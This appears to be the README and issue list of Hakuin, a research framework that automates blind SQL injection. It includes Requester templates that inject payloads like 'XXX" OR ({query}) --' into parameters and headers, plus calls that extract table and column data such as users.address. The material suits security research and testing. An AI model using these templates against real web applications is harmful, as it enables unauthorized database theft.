
hakuin's Introduction

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

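Example 1 - Query Parameter Injection with Status-based Inference

import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # aiohttp has no module-level get(); requests go through a ClientSession.
        # Passing the payload via params lets aiohttp URL-encode it.
        params = {'n': f'XXX" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', params=params) as r:
                # The query resolved to True if the server answered 200
                return r.status == 200
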
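Example 2 - Header Injection with Content-based Inference

class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        # aiohttp has no module-level get(); send the request through a ClientSession.
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                # The query resolved to True if the page contains 'found'
                return 'found' in await r.text()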
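
To see why a True/False answer is all a Requester has to return, the following minimal sketch recovers a string using nothing but a boolean oracle and binary search. It is an illustration only, not Hakuin's actual inference code: `SECRET`, `oracle`, `extract_char`, and `extract_string` are hypothetical names, and the oracle is simulated locally instead of sending requests.

```python
import asyncio

SECRET = 'admin'  # hypothetical stand-in for a value stored in the target DB


async def oracle(position, threshold):
    """Simulated Requester: is the character code at `position` below `threshold`?

    In a real attack, this would be one injected query and one HTTP request.
    """
    return ord(SECRET[position]) < threshold


async def extract_char(position):
    """Recover one ASCII character with binary search over [0, 128)."""
    low, high = 0, 128
    while high - low > 1:
        mid = (low + high) // 2
        if await oracle(position, mid):
            high = mid  # the code is in [low, mid)
        else:
            low = mid   # the code is in [mid, high)
    return chr(low)


async def extract_string(length):
    """Recover `length` characters one by one."""
    return ''.join([await extract_char(i) for i in range(length)])
```

Each ASCII character costs seven oracle calls here, because the interval [0, 128) is halved seven times before a single value remains. Hakuin's optimizations aim to reduce that number.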

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL

import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester:    Use this Requester
    # dbms:         Use this DBMS
    # n_tasks:      Spawn N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    # asyncio.run() creates the event loop, runs main(), and closes the loop
    asyncio.run(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas

# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')

Example 2 - Extracting Tables

tables = await ext.extract_table_names(strategy='model')

Example 3 - Extracting Columns

columns = await ext.extract_column_names(table='users', strategy='model')

Example 4 - Extracting Tables and Columns Together

metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns

# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')

Example 2 - Extracting Textual Columns

# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')

Example 3 - Extracting Integer Columns

res = await ext.extract_column_int(table='users', column='id')

Example 4 - Extracting Float Columns

res = await ext.extract_column_float(table='products', column='price')

Example 5 - Extracting Blob (Binary Data) Columns

res = await ext.extract_column_blob(table='users', column='id')
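
To give a rough intuition for why a model-based text strategy can beat plain binary search, here is a small sketch of frequency-ordered guessing with an adaptive unigram model. It is a simplified illustration under stated assumptions and not Hakuin's implementation: `binary_search_char` and `extract_text` are hypothetical names, the secret is passed in directly to simulate the oracle, and each comparison stands for one injected query.

```python
from collections import Counter


def binary_search_char(is_less_than):
    """Recover an ASCII character with binary search; returns (char, requests)."""
    low, high, requests = 0, 128, 0
    while high - low > 1:
        mid = (low + high) // 2
        requests += 1
        if is_less_than(mid):
            high = mid
        else:
            low = mid
    return chr(low), requests


def extract_text(secret, max_guesses=2):
    """Extract `secret` character by character; returns (text, total requests).

    Before falling back to binary search, ask equality queries for the
    characters seen most often so far (the adaptive unigram model).
    """
    counts = Counter()
    total = 0
    out = []
    for ch in secret:
        found = None
        for guess, _ in counts.most_common(max_guesses):
            total += 1  # one simulated equality query
            if guess == ch:
                found = guess
                break
        if found is None:
            found, used = binary_search_char(lambda n, c=ch: ord(c) < n)
            total += used
        counts[found] += 1  # adapt the model to the extracted data
        out.append(found)
    return ''.join(out), total
```

In this sketch, `extract_text('aaaa')` needs 10 simulated queries instead of the 28 that pure binary search would use, while text with no repeated characters becomes more expensive because every failed guess costs a query. That trade-off is one reason to choose the strategy dynamically.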

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}

hakuin's Issues

Tool on top of Hakuin - hk.py

Implement a wrapper tool, hk.py, that can be used to quickly call Hakuin's basic functionality without the need to write your own Python scripts.

Extract all schemas, not just the default one

It is typically possible to extract all schemas from a vulnerable web application, but Hakuin currently extracts only the default one, i.e., the one the application is connected to. Supporting extraction of all schemas should only require rewriting the injected queries to take the DB name into consideration. For instance, users will become dbo.users.

Support Unicode

Currently, Hakuin supports only ASCII extraction. Extending the implementation to include Unicode characters requires only minor changes to the extraction logic and a few new queries.

Support extraction of advanced data types

Hakuin currently extracts texts, ints, floats, and blobs. There are, however, other (possibly DBMS-specific) data types, such as polygon, json, and more. If possible, Hakuin should cast them to text and extract them.

Support more DBMS

Hakuin currently supports only SQLite and MySQL DBMSs, but there are other popular engines.

Hakuin should support:

  • SQLite
  • MySQL
  • Oracle
  • Microsoft SQL Server
  • PostgreSQL
  • Microsoft Access
  • IBM DB2

Optimize extraction of non-textual columns

Hakuin currently extracts non-textual data types with binary search. This can be done more efficiently.

Int:

  • guessing
  • check if all positive
  • model the values with Gaussian distribution and set initial lower and upper bounds to -2 and +2 sigma respectively
  • dynamic

Float:

  • guessing
  • check if all positive
  • dynamic

Bytes:

  • guessing
  • dynamic just like for text, i.e., unigram/fivegram predictions
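
The Gaussian idea for integers listed above could look roughly like the sketch below. It assumes some values of the column are already known, derives the initial bounds from their mean and standard deviation, and widens the bounds when the target value falls outside them. All names (`initial_bounds`, `extract_int`, `is_less_than`) are hypothetical and the oracle is simulated with a lambda.

```python
import math
import statistics


def initial_bounds(known_values):
    """Return [low, high) covering roughly mean - 2 sigma to mean + 2 sigma."""
    mean = statistics.mean(known_values)
    sigma = statistics.pstdev(known_values)
    low = math.floor(mean - 2 * sigma)
    high = math.ceil(mean + 2 * sigma) + 1  # exclusive upper bound
    return low, high


def extract_int(is_less_than, low, high):
    """Find the secret integer, given an oracle answering `secret < n`."""
    step = max(high - low, 1)
    # Widen the lower bound until the secret is no longer below it.
    while is_less_than(low):
        low -= step
        step *= 2
    # Widen the upper bound until the secret is below it.
    while not is_less_than(high):
        high += step
        step *= 2
    # Ordinary binary search inside [low, high).
    while high - low > 1:
        mid = (low + high) // 2
        if is_less_than(mid):
            high = mid
        else:
            low = mid
    return low
```

For example, `extract_int(lambda n: 101 < n, *initial_bounds([100, 102, 98, 101, 99]))` starts from the narrow interval [97, 104) instead of the full integer range, so values close to the ones already seen are found with few requests.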

Support concurrency

Hakuin blocks on sending requests. This is not necessary. Instead, there should be multiple tasks extracting column rows independently.

Implementing this feature will require some sync code as the tasks share the same language models.
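
A minimal asyncio sketch of this design is shown below: several tasks pull row indices from a queue and extract rows independently, while updates to the shared model are guarded by a lock. This is an assumption about how it could be structured, not Hakuin's code. `ROWS`, `SharedModel`, `extract_row`, `worker`, and `extract_column` are hypothetical names, and the HTTP requests are simulated with a short sleep.

```python
import asyncio

ROWS = ['alice', 'bob', 'carol', 'dave']  # simulated column content


class SharedModel:
    """Stand-in for a language model shared by all extraction tasks."""

    def __init__(self):
        self.lock = asyncio.Lock()
        self.seen = []

    async def update(self, value):
        # The lock keeps updates atomic once they involve awaits of their own.
        async with self.lock:
            self.seen.append(value)


async def extract_row(index):
    await asyncio.sleep(0.01)  # simulates waiting for HTTP responses
    return ROWS[index]


async def worker(queue, results, model):
    """Extract rows until the queue of row indices is empty."""
    while True:
        try:
            index = queue.get_nowait()
        except asyncio.QueueEmpty:
            return
        value = await extract_row(index)
        await model.update(value)
        results[index] = value


async def extract_column(n_tasks):
    queue = asyncio.Queue()
    for index in range(len(ROWS)):
        queue.put_nowait(index)
    results = [None] * len(ROWS)
    model = SharedModel()
    await asyncio.gather(*(worker(queue, results, model) for _ in range(n_tasks)))
    return results, model
```

Writing each result to its row index keeps the output in order regardless of which task finishes first.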

Automatic DBMS fingerprinting

Hakuin now requires users to specify which DBMS engine is used by the target. This is not practical, because users have to obtain this information manually prior to extraction. Hakuin should include a set of test queries that detect the DBMS automatically.
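
One possible shape for such test queries is sketched below. The probe expressions are illustrative assumptions: each relies on a function or variable that exists in one DBMS family (`sqlite_version()`, `connection_id()`, `pg_backend_pid()`, `@@SPID`), and the sketch assumes a failing query is observed as False by the Requester. `PROBES`, `fingerprint`, and `make_simulated_oracle` are hypothetical names.

```python
# Hypothetical probes; each should only evaluate successfully on one DBMS family.
PROBES = [
    ('SQLite', 'sqlite_version() IS NOT NULL'),
    ('MySQL', 'connection_id() IS NOT NULL'),
    ('PSQL', 'pg_backend_pid() IS NOT NULL'),
    ('MSSQL', '@@SPID IS NOT NULL'),
]


def fingerprint(oracle):
    """Return the first DBMS whose probe the oracle reports as True, else None."""
    for name, probe in PROBES:
        if oracle(probe):
            return name
    return None


def make_simulated_oracle(dbms):
    """Simulate a target that only understands the probe of the given DBMS."""
    supported = dict(PROBES)[dbms]
    return lambda query: query == supported
```

In the worst case this costs one request per supported DBMS, which is negligible compared to the extraction itself.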

Check NULL values

Hakuin does not check NULL values before attempting to extract columns. This may lead to wrong results.

Hakuin should check NULL values in a similar fashion as it checks ASCII values, i.e., first on the column level and then on the row level.
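
The two-level check could be sketched as follows. The column is simulated as a Python list, and every counted request stands for one injected query. `extract_column` is a hypothetical helper for this illustration, not part of Hakuin's API.

```python
def extract_column(column):
    """Return (values, requests) using a column-level, then row-level NULL check."""
    requests = 1  # column-level check: does the column contain any NULL?
    has_null = any(value is None for value in column)

    values = []
    for value in column:
        if has_null:
            requests += 1  # row-level check, only needed if NULLs exist
            if value is None:
                values.append(None)
                continue
        values.append(value)  # stand-in for the normal extraction of the row
    return values, requests
```

When the column contains no NULL values, the row-level checks are skipped entirely, so the overhead is a single extra request per column.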
